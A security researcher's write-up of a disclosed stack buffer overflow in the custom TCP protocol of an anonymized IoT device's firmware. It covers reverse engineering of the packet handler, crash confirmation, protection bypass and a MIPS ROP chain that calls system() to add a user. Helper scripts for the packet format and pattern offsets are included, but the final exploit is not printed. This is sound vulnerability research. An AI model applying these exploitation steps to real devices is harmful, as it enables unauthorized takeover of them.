Intro
This is a writeup of a buffer overflow we discovered while toying with an outdated firmware of an IoT device. The vulnerability lay in the implementation of a custom protocol over TCP, which accepted packets larger than the stack buffer meant to hold them.
The device vendor requested an anonymization of this article to buy users time to update their systems. Consequently, the chapters on opening the device, dumping the firmware and getting a shell were scrapped, leaving only the discovery and exploitation of the buffer overflow.
Table of Contents
- Identifying the executables behind the listening TCP ports
- Reversing the vulnerable function
- Identifying which process listens on TCP 4649
- Observing the segfault with a debugger
- Bypassing the binary protections
- canary is false.
- pic (Position-Independent Code) is false.
- nx (No-eXecute) is true.
- Little tangent about macros and loops in radare2
- ASLR (Address Space Layout Randomization) is set to 2.
- Building the ropchain
- Exploiting the buffer overflow
- Closing words
- References
Identifying the executables behind the listening TCP ports
Since our goal is to find a remote exploitation scenario, let’s try to map the open ports to the running processes.
Let us take a look at the listening ports (user input in blue).
Not cool. Embedded systems care a lot about their sizes and often cut down on some of our beloved binary utilities.
Luckily, it is still possible to list the listening ports via procfs by reading /proc/net/tcp [1] (highlights in red).
Let’s convert the hex values into a human-friendlier format. (redacted text in italics).
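The same conversion can be scripted. The sketch below is a minimal Python illustration rather than the commands used on the device: the function name, the `byteorder` parameter and the sample table (including its inode numbers) are assumptions made up for the example. It relies on the documented layout of /proc/net/tcp, where the port is plain hexadecimal, the IPv4 address is printed in the host's byte order, and state 0A means LISTEN.

```python
import socket

TCP_LISTEN = 0x0A  # value of the "st" column for listening sockets


def parse_proc_net_tcp(text, byteorder="little"):
    """Return (ip, port, inode) for every listening IPv4 socket.

    `byteorder` is the byte order of the machine that produced the
    table (an assumption the caller has to supply).
    """
    listeners = []
    for line in text.splitlines()[1:]:  # first line is the column header
        fields = line.split()
        if len(fields) < 10:
            continue
        if int(fields[3], 16) != TCP_LISTEN:
            continue
        addr_hex, port_hex = fields[1].split(":")
        raw = int(addr_hex, 16).to_bytes(4, byteorder)
        listeners.append((socket.inet_ntoa(raw), int(port_hex, 16), int(fields[9])))
    return listeners


# Hypothetical sample, not the device's real table.
SAMPLE = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:1229 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 1001 1 00000000 100 0 0 10 0
   1: 0100007F:08AE 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 1002 1 00000000 100 0 0 10 0
   2: 0100007F:08AE 0100007F:C000 01 00000000:00000000 00:00000000 00000000     0        0 1003 1 00000000 100 0 0 10 0
"""

for ip, port, inode in parse_proc_net_tcp(SAMPLE):
    print(f"{ip}:{port} -> socket inode {inode}")
```

Here 0x1229 decodes to port 4649 and 0x08AE to port 2222; the third row is skipped because its state is not LISTEN.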
We now have the listening ports and their respective TCP socket inodes.
Since inodes are file identifiers, it is also possible to list them via /proc/<pid>/fd/* [2].
Here we have the PIDs that possess a file descriptor for the inodes corresponding to our listening TCP sockets.
By pairing the inodes under /proc/net/tcp with those under /proc/<pid>/fd/*, we can infer which process listens on which port.
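The pairing step can be sketched in Python as follows. This is an illustration under stated assumptions: the helper names, the input dictionaries and the sample PIDs and inodes are hypothetical, and the script is meant for a machine that has Python, for instance working on output copied from the device. It only relies on the fact that a file descriptor pointing to a socket shows up as a symlink of the form `socket:[<inode>]`.

```python
import os
import re

SOCKET_LINK = re.compile(r"socket:\[(\d+)\]")


def read_fd_links(proc_root="/proc"):
    """Collect {pid: [symlink targets]} from /proc/<pid>/fd/* (Linux only)."""
    links = {}
    for entry in os.listdir(proc_root):
        if not entry.isdigit():
            continue
        fd_dir = os.path.join(proc_root, entry, "fd")
        try:
            links[int(entry)] = [
                os.readlink(os.path.join(fd_dir, fd)) for fd in os.listdir(fd_dir)
            ]
        except OSError:  # process exited or permission denied
            continue
    return links


def pids_by_port(inode_to_port, fd_links):
    """Map each listening port to the PIDs holding a descriptor on its socket."""
    result = {}
    for pid in sorted(fd_links):
        for target in fd_links[pid]:
            match = SOCKET_LINK.fullmatch(target)
            if not match:
                continue
            port = inode_to_port.get(int(match.group(1)))
            if port is not None and pid not in result.setdefault(port, []):
                result[port].append(pid)
    return result


# Hypothetical data standing in for the redacted listings.
inode_to_port = {1001: 4649, 1002: 2222}
fd_links = {
    260: ["/dev/null", "socket:[1001]", "socket:[1002]"],
    261: ["socket:[1001]"],
    300: ["socket:[9999]"],
}
print(pids_by_port(inode_to_port, fd_links))
```

Several PIDs can appear for one port, which matches the file descriptor inheritance mentioned in the text.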
Multiple processes run with the exact same command line, which can be explained by file descriptor inheritance.
The process listening on port 8888 is a modded version of the lightweight SSH server dropbear. A few functions and 2 calls to system were added to the binary but will not be further explored here.
The executable ./REDACTED listens on ports 2222 and 4649. This single binary seems to be responsible for a large part of the main functionalities of the device.
TCP port 2222 is a well-documented port for this IoT device, so let’s take the adventurous way and focus our efforts on the much less documented TCP port 4649.
Reversing the vulnerable function
The vulnerable executable ./REDACTED can be found in the firmware dump on the attacking machine (dark background).
We can open it in ghidra [3] and read upstream of all calls to bind until we finally get to the function handling incoming packets on TCP port 4649.
Let’s first take a look at the local variables that are going to be stored on the stack.
When the function receives a TCP packet, it only accepts it if the first 3 bytes are equal to [‘U’, -0x56, ‘\0’] (0x55AA00 in hex, since -0x56 is 0xAA when read as a signed byte). Let’s call these 3 bytes the MAGIC section of the packet.
It then reads the next 3 bytes. The 1st byte is ignored, the 2nd is stored as the most significant byte of the length and the 3rd as the least significant. Let’s call these 3 bytes the LENGTH section, as the function then reads the next LENGTH + 1 bytes.
We are going to call these bytes the DATA section, except for the last one, which we define as the CRC byte.
The CRC byte is the only one that gets checked: it must be equal to the sum of all other received bytes.
If the CRC byte is correct, the whole packet is saved on the heap, at an address stored in the global variable REDACTED_BUFFER.
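The packet layout described above can be sketched in Python. This is a minimal illustration, not the script used in the article. Two details are assumptions: the single CRC byte is taken to be the sum of all preceding bytes (header included) modulo 256, and the ignored first LENGTH byte is set to zero. The function names are hypothetical.

```python
MAGIC = bytes([0x55, 0xAA, 0x00])  # 'U', -0x56 as a signed byte, '\0'


def checksum(data: bytes) -> int:
    """Sum of the bytes, truncated to one byte (assumed modulo 256)."""
    return sum(data) & 0xFF


def build_packet(data: bytes) -> bytes:
    """MAGIC (3 bytes) + LENGTH (3 bytes) + DATA + CRC (1 byte)."""
    if len(data) > 0xFFFF:
        raise ValueError("DATA does not fit in a 2-byte length")
    # 1st LENGTH byte is ignored by the receiver, then MSB, then LSB.
    length = b"\x00" + len(data).to_bytes(2, "big")
    body = MAGIC + length + data
    return body + bytes([checksum(body)])


def parse_packet(packet: bytes) -> bytes:
    """Mirror of the receiver's checks; returns the DATA section."""
    if packet[:3] != MAGIC:
        raise ValueError("bad MAGIC")
    length = int.from_bytes(packet[4:6], "big")
    if len(packet) < 6 + length + 1:
        raise ValueError("truncated packet")
    body, crc = packet[: 6 + length], packet[6 + length]
    if checksum(body) != crc:
        raise ValueError("bad CRC")
    return body[6:]


packet = build_packet(b"AB")
print(packet.hex())
```

Note that neither function limits the size of DATA beyond what the 2-byte length can express, which mirrors the missing bounds check in the receiver.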
We can also observe that the vulnerable function sets the local buffer back to zeros.
Here’s a screenshot of the local variables annotated with our newly defined packet structure.
We’re facing a pretty straightforward case of stack-based buffer overflow.
The 1048-byte buffer can be overflowed, as no checks are performed against the length of the DATA section, which can grow as big as 65535 bytes (0xffff in hex).
Identifying which process listens on TCP 4649
Out of the 10 processes possessing a file descriptor pointing to the socket bound to TCP port 4649, only one is listening on it. We can find the right process by observing each one through a debugger.
Since gdb is not installed on the target device, we will use the target’s busybox tftp client to download a static build of gdbserver for MIPS processors [4].
Let’s use gdb-multiarch to perform a backtrace remotely from our attacking machine.
Process 260 currently hangs on a call to select and will return to the address 0x004bda94, located inside our vulnerable function starting at address 0x004bd50c.
We can infer that it is the one actively listening to our target TCP socket.
Observing the segfault with a debugger
Let’s try to confirm the stack buffer overflow by overwriting the return address of the vulnerable function.
The following Python script sends a valid packet with a 2048-byte DATA section containing a succession of unique 4-byte sequences [5].
Let’s look at the state of the stack before we send our payload.
Here’s the stack right before the packet’s CRC gets validated. We can see the buffer overflow.
If we resume the execution of the process, it crashes as it tries to jump to the return address of the function which has been overwritten by our pattern.
We can also observe that the buffer has been reset to 0 up until its expected max length.
Looking at the function’s return routine, we can see that the return address is pulled from the stack to the ra register.
The return address saved on the stack has been overwritten with 0Bs1 (0x30427331 in hex). The string 0Bs1 has an offset of 1322 in our pattern, so we now know exactly where to write the new return address in our payload.
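The offset lookup can be reproduced with a few lines of Python. The sketch below does not use the package referenced in [5]; it is a self-contained generator, under the assumption that the pattern follows the common uppercase, lowercase, digit scheme (Aa0Aa1Aa2...). The function names are hypothetical.

```python
import string


def cyclic_pattern(length: int) -> bytes:
    """Build an 'Aa0Aa1Aa2...' pattern in which every 4-byte window is unique."""
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    raise ValueError("requested length exceeds the pattern's period")


def pattern_offset(needle: bytes, length: int = 2048) -> int:
    """Offset of `needle` in the pattern, or -1 if it does not occur."""
    return cyclic_pattern(length).find(needle)


# The value read from ra, converted back to the bytes as they sit in memory.
overwritten_ra = (0x30427331).to_bytes(4, "big")
print(overwritten_ra, pattern_offset(overwritten_ra))
```

With this scheme, the bytes 0Bs1 are found at offset 1322 of the DATA section, matching the value quoted above.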
Bypassing the binary protections
Our goal is rather straightforward: execute arbitrary commands on the target system. To define an attack plan, let’s look at the protections standing in our way.
Let’s boot up radare2, the triple A reversing framework [6].
canary is false.
The canary is a random value placed on the stack before the saved return address of the function, so an overflow has to overwrite it before it can reach the return address.
If the canary differs from its original value when the function is about to return, the program throws an error before jumping, thus denying us control of the process’ execution flow.
Here this protection is not used, so we will not need to hunt for canaries to exploit the buffer overflow.
pic (Position-Independent Code) is false.
Position-Independent Code allows the binary to be loaded at a randomized start address in the process’ memory.
All absolute address references are substituted with relative ones to preserve the binary’s execution flow.
Here it is set to false, so the addresses of native code and of global variables are both constant.
nx (No-eXecute) is true.
This protection marks the stack as non-executable.
We will not be able to just put a shellcode in our payload and jump to the stack to execute it. We will need to jump to an executable memory page, like the .text section of the process.
Since the program already uses the system function, our goal will be to jump to an existing call to system with a custom string as argument. Let’s say the first one, at address 0x00425c04.
As register gp already contains the right value at the end of the vulnerable function, we’ll just need to populate a0 (register holding the first argument) with an address pointing to our custom command string.
Little tangent about macros and loops in radare2
What if we want to look at all calls to system in the binary to choose the one that best suits our needs? Maybe one of them already moves a controllable register to a0?
Well in the end no call to system was that much more powerful than the first one, but the process is pretty neat as we can do better than manually seeking to each of the 36 calls.
radare2 implements automation features in the form of macros [7] and loops [8]!
Let’s first display the end result and work our way back there.
The above command disassembles the 8 instructions preceding all calls to system in the binary, separating them with the string ——.
To do this, it first creates an unnamed macro.
It then defines the addresses to loop over by executing the following inside backticks.
Pretty cool!
Let us go back to the binary protections now.
ASLR (Address Space Layout Randomization) is set to 2.
A value of 2 in /proc/sys/kernel/randomize_va_space [9] means that the stack, heap, shared libraries and data sections’ start addresses will be randomized on each execution of the binary.
The vulnerable function first saves our packet in a local variable on the stack and then copies it to the heap at an address saved in the global variable REDACTED_BUFFER.
The stack and the heap may be randomized, but we still can find our packet in the heap using this global variable as a pointer.
As the MAGIC section (0x55aa00) and LENGTH section (0x008000) both contain a null byte, which would terminate a command string early, we want to add an offset to REDACTED_BUFFER until it points to the DATA section.
Interestingly, REDACTED_BUFFER + 4 always points 1056 bytes after the start of our packet, so we can just use this address instead.
REDACTED_BUFFER + 4 points to Bj0B (0x426a3042 in hex) which has an offset of 1050 bytes in our pattern. We can put our custom command string at this offset of the DATA section.
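The offset arithmetic can be checked with a short Python sketch. It only restates numbers from the text: a 6-byte header (3 bytes of MAGIC plus 3 bytes of LENGTH) and a pointer landing 1056 bytes into the packet. The helper names, the filler byte and the placeholder command are assumptions for illustration.

```python
HEADER_LEN = 3 + 3  # MAGIC + LENGTH sections
POINTER_OFFSET_IN_PACKET = 1056  # where REDACTED_BUFFER + 4 points, per the text


def data_offset(packet_offset: int) -> int:
    """Translate an offset in the whole packet into an offset in DATA."""
    return packet_offset - HEADER_LEN


def place_at(data_len: int, offset: int, payload: bytes, filler: bytes = b"A") -> bytes:
    """Return a DATA section of `data_len` bytes with a NUL-terminated payload at `offset`."""
    end = offset + len(payload) + 1
    if offset < 0 or end > data_len:
        raise ValueError("payload does not fit in the DATA section")
    buf = bytearray(filler * data_len)
    buf[offset:end] = payload + b"\x00"
    return bytes(buf)


offset = data_offset(POINTER_OFFSET_IN_PACKET)
data = place_at(2048, offset, b"echo hello")  # placeholder command
print(offset, data[offset : offset + 11])
```

The result, 1050, agrees with the offset of Bj0B in the pattern.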
Building the ropchain
A ropchain is a succession of gadgets chained together to achieve an end goal. A gadget is a sequence of instructions fulfilling a small need, ending with a controllable jump instruction to call the next gadget in the chain.
We’ve already set our end goal: jumping to the first call to system, located at address 0x00425c04.
For this call to execute arbitrary commands we have to populate a0 (the register holding the first argument in MIPS) with the address of our custom command string (contained in REDACTED_BUFFER + 4).
Let’s try to find a gadget that fulfills that need. We can list the available gadgets using ROPgadget [10].
It is a very nice tool that can even create the whole ropchain for you with --ropchain, but the feature is not available on MIPS yet.
We can also use radare2 with /R.
In both cases that’s a lot of gadgets to sift through. Since we already control the stack, we could use a gadget that loads a value from it into the a0 register.
Let’s search for a load word instruction (lw) that takes the stack pointer (sp) as source and the register a0 as destination.
No luck.
But we also control the value of the frame pointer (fp in radare2, s8 in gdb) as it is also loaded from the stack in the vulnerable function’s return routine.
Let’s try to find gadgets with the frame pointer (fp) as source.
We got a few, but their jumps are based on v0 and not on the stack so we’ll need another gadget to populate this register…
You get it, a gadget calls for another and we need to climb up the chain until all loose ends are tied up.
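The register-based filtering described in this section can be sketched with a regular expression over a textual gadget listing. This is an illustration only: the `address : insn ; insn` line format and the three sample gadgets (addresses and instructions alike) are hypothetical stand-ins for the redacted tool output, and the function name is made up.

```python
import re


def find_loads(lines, dest, base):
    """Keep gadget lines containing 'lw <dest>, <offset>(<base>)'."""
    pattern = re.compile(
        rf"\blw\s+\$?{re.escape(dest)}\s*,\s*"
        rf"(?:-?(?:0x[0-9a-fA-F]+|\d+))?\(\$?{re.escape(base)}\)"
    )
    return [line for line in lines if pattern.search(line)]


# Hypothetical gadget listing, not taken from the real binary.
GADGETS = [
    "0x00401000 : lw $a0, 0x28($fp) ; jalr $v0 ; nop",
    "0x00402000 : lw $ra, 0x1c($sp) ; jr $ra ; addiu $sp, $sp, 0x20",
    "0x00403000 : lw $a0, 0x10($s0) ; jr $ra ; nop",
]

print(find_loads(GADGETS, "a0", "sp"))  # nothing loads a0 from sp here
print(find_loads(GADGETS, "a0", "fp"))
```

Filtering on the destination and base registers first keeps the candidate list short; the jump at the end of each remaining gadget then tells which register the next gadget has to populate.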
Exploiting the buffer overflow
We settled on a working ropchain and filled the stack accordingly. Here is what our Python script looks like now.
Here is our complete custom ropchain.
Let’s send our payload and follow the execution flow with gdb.
Breaking at the end of the vulnerable function, the ra register is pointing to the first gadget in the chain;
The stack is ready to be fed into the ropchain;
And the address of our command string is stored at REDACTED_BUFFER + 4.
Breaking at the end of the 1st gadget, s1 contains the address of the end goal, s0 the address of gadget 3 and ra the address of gadget 2.
Breaking at the end of the 2nd gadget, a1 now contains the address of the end goal.
The 1st and 3rd gadgets share the same return address. Breaking at the end of the 3rd gadget, v0 now contains the address of the end goal and ra the address of gadget 4.
Breaking at the end of the 4th gadget, s8 (fp in radare2) contains the address REDACTED_BUFFER + 4 - 40 and ra the address of gadget 5.
Breaking at the end of the 5th gadget, a0 finally points to the command string.
Let’s continue until the crash of the process.
We receive a ping, signaling the execution of our command string.
Let’s verify that the new user has successfully been created.
We can now connect to the target device via ssh with our newly defined credentials.
And voilà, we’ve exploited the stack-based buffer overflow with a custom ropchain.
Closing words
This vulnerability was discovered while toying with the outdated firmware of an IoT device.
We contacted the vendor without really expecting anything, but they not only responded, they were proactive in developing a fix for this vulnerability and even gave away $600 of reward money.
IoT and embedded systems aren’t often praised for the mature security stance of their vendors so it feels like a shame that we are not able to cite them here.
References
[1] https://docs.kernel.org/networking/proc_net_tcp.html
[2] https://docs.kernel.org/filesystems/proc.html#proc-pid-fd-list-of-symlinks-to-open-files
[3] https://github.com/NationalSecurityAgency/ghidra
[4] https://github.com/secnigma/gdb-static-cross/tree/master/prebuilt
[5] https://pypi.org/project/exploit-patterns/
[6] https://github.com/radareorg/radare2
[7] https://book.rada.re/scripting/macros.html
[8] https://book.rada.re/scripting/loops.html
[9] https://www.kernel.org/doc/Documentation/sysctl/kernel.txt#randomize_va_space
[10] https://github.com/JonathanSalwan/ROPgadget